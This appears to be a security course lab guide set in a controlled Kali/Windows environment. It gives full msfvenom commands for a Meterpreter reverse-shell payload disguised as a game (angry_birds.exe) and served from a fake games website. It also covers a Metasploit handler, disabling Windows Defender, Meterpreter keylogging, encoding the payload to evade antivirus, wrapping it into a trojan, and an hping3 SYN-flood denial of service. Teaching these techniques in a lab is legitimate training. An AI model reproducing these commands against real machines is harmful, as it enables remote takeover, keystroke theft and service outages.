Metasploit The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. The Metasploit framework available in Kali Linux is a penetration testing software for offensive security teams.
Msfvenom Msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.
RAT
Our malware has a Reverse Shell payload. When a malware is wrapped with another useful program, like a game, we basically create a Remote Access Trojan, or RAT. Our malware allows the hacker to gain remote access to the victim’s computer.
This lab follows these steps Step 1: Create the malware using msfvenom
In this step, you are creating an executable file with the malicious payload. Step 2: Distribute the malware using a website
In this step, you will upload your malware file into a web server where unsuspecting victims can download it. Step 3: Start a handler that listens to incoming connections
In this step, you sit and wait until victims click the malicious links on your website. Step 4: Hack away…
In this step, you can do whatever you want.
In this activity, you will create and distribute malware in a controlled environment.
Expert Mode
Download the games.rar file and extract its content
Start the Apache web server on Kali
Copy the games website into the web server's /html folder
Test the server and the games site
Create a reverse TCP payload using msfvenom
Upload the payload output file (malware) to the website
Create a listener using metasploit
Download and run the malware from your target machine
Download the games.rar file and extract its content
In Kali, start the Apache web server using the following command: sudo apache2ctl start An alternative command to run the Apache server if you're using Kali 2024: sudo service apache2 start
Navigate to the var/www/html folder and open it as Root
Copy the newly extracted games folder inside the var/www/html folder in Kali
Once copied, right-click the games folder and go to Properties for the Others group to Read and Write
Do the same for the index.html file inside the games folder
Test the website from your Windows by using the IP address of your Kali in Internet Explorer. Example: http://192.168.182.128
Navigate to the games folder by typing /games after the IP address in the browser to test the Games Hub webpage. Example: http://192.168.182.128/games
The Malware
Using MSFVENOM, create the payload and save it in a file called angry_birds.exe by typing the following code: msfvenom -p windows/meterpreter/reverse_tcp lhost=<Kali's IP Address> lport=443 -f exe -o angry_birds.exe
It goes without saying that you should use your Kali's IP address without the <> The above is a general pyaload; if we want to target 64-bit architecture, use the below: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali's IP Address> lport=443 -f exe -o angry_birds.exe -a x64
Msfvenom Code Explanation
-p use this payload (value is the reverse TCP payload) lhost= the IP address of the hacker’s machine lport= the port number on the hacker’s machine -f format of the output malware file (value is exe for Windows executable) -o actual output file, or the malware file itself (value is a name of your choice with extension you selected, e.g. myvirus.exe) -a the architecture (x64 = 64 bit)
The output file (angry_birds.exe) will be in your Kali folder. Copy it into the games web folder
The Listener/Handler
We will use the Metasploit framework to create a handler the will listen to incoming connections from infected computers. Start Metasploit and follow the steps shown below: msfconsole msf6 > use exploit/multi/handler set payload windows/meterpreter/reverse_tcp If you used the 64-bit architecture in msfvenom, use the payload below: set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.182.128 set lport 443 run
The output of the steps above is a running reverse TCP handler. Confirm that it started and is listening on your Kali port 443
Go to you Windows Internet Explorer, refresh, and click the Angry Birds link
Click the Run option and confirm despite the warning Windows Defender will most likely block this file. To prevent Defender from blocking the malware:
Open Windows Defender
Click Settings
Turn off Real-Time Protection
Go back to your Metasploit listener and notice the new Meterpreter session
Meterpreter: General
Use the help command in meterpreter to learn about the options available for you. Here are some useful options screenshot Take a screenshot of your hacked target screenshare Open a live view of your hacked target sysinfo Get information about the remote system, such as OS shell Open a system command shell of the hacked target and run any Windows command you want
Meterpreter: Keylogger
A keylogger records the keystrokes on the victim's machine. Run the following commands: ps List running processes on the target using the ps command and note down the process ID (PID) of explorer.exe migrate 1884 Migrate to the explorer process (note: use the PID you discovered; not the one in the example) getpid Ensure the migration is done keyscan_start Start a keylogger on the hacked target
Go to your Windows and do something that requires typing (e.g. type in a text document)
Go back to Kali and get the keystrokes using the following command keyscan_dump
Malware Analysis is the study of the functionality, origin and potential impact of a given malware. In other words, it is an investigation of the risks, intentions, and functionality of malware. There are mainly two types categorized by analysis method:
Static Analysis
Dynamic Analysis
One way to evade detection by AV software is to encode the malware. MSFVENOM has built-in encoding capabilities with many encoders readily available.
In this activity, you will encode the malware in an attempt to evade detection. You will also perform static malware analysis to determine the best performing malware.
Expert Mode
Create another version of the malware (angry_birds_v2.exe ) but this time encode it with the x86/shikata_ga_nai encoder
Create different encoded versions, each with a different number of encoding iterations
Create different encoded versions, each with a different encoder
Use the following command to list available encoders msfvenom –l encoders
Create a new malware file called angry_birds_v2.exe as we did in Task 1 but this time using an encoder msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.182.128 lport=443 -e x86/shikata_ga_nai -f exe -o angry_birds_v2.exe We used the -e option (encoder) and the name of the encoder: x86/shikata_ga_nai Notice that only one encoding iteration was performed
Let’s create version 3 (angry_birds_v3.exe) using 20 iterations msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.182.128 lport=443 -e x86/shikata_ga_nai –i 20 -f exe -o angry_birds_v3.exe We used the -i option (# of iterations)
Repeat the above to create angry_birds_v4.exeusing the cmd/powershell_base64 encoder
Repeat the above to create angry_birds_v5.exeusing the cmd/powershell_base64 encoder with 10 iterations You should not have 5 malware files in your Kali folder
Malware Analysis
Visit the Virus Total » website and upload the first version of your RAT (angry_birds.exe)
Note down how many AV detected the malware
Repeat for all versions and note down your findings (you will need the numbers in the questions section)
Let us search for malware using their hash signature. On the Virus Total website, go to Search and look for the following signatures
Signature 1: e3ec6eac76a6b6692a56e2eac4106d1309a4aa2d0aca52823b6ddb8d4f4428d9
Signature 2: c2cf2118550a0fd7f81fe9913fe36be24c03a0ae5430b94557e0ee71c550a58c
Signature 3: 0a76c55fa88d4c134012a5136c09fb938b4be88a382f88bf2804043253b0559f
For each signature, write down the malware name and/or type and how many AV software flagged it (you will need this information to answer some questions later)
If we wrap our malware with another usable software, like a game, then we have a Trojan. Since our malware allows us to remotely connect to the target machine, it can be classified as a RAT. MSFVENOM has two options that allow us to do this:
-x
Specify a custom executable file to use as a template
-k
Preserve the --template behavior and inject the payload as a new thread
In this activity, you will convert our malware into a Trojan.
Expert Mode
Your mission, should you choose to accept it, is to convert our malware intro a Trojan
In order to complete this task, you will need a useful program (e.g., a game). The games web folder has two games you can use Mine Sweeper and Dark Snakes. Choose one for this task
Using the sample code above as a reference, convert our malware intro a Trojan. You will need the -x and -k options
hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping program does with ICMP replies. HPING3 can be used to flood port 80 (HTTP service port) on the target by sending a very large number of packets.
In this activity, you will perform a DoS attack from and render a service unavailable on the target.
Expert Mode
Using HPING3, perform a DoS attack on the HTTP service running on the Windows 10 target
Get the IP address of the target using NMAP: nmap -sn <Your Network IP>
Find out what services are running on the target: nmap <Target IP>
Open the Web browser in Kali and type in the IP address of your target. You should be able to see a website (see below)
Using HPING3, perform a DoS attack on the Windows 10 web server hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source <Windows 10 IP address> hping in flood mode, no replies will be shown
HPING3 Code Explanation
-c 10000 Specify the number of packets to send -d 120 Size of each packet -S Send SYN packets only -w 64 TCP window size -p 80 Target port 80 (HTTP) --flood Flood mode (as fast as possible) --rand-source Send packets from random source port (on Kali) IP Address Target IP address (Windows 10)
While HPING3 is running, go back to the web browser and click few of the links on it (give it few seconds for the flood to kick in). Basically, the server will be too busy and the webpages will take too ling to respond.
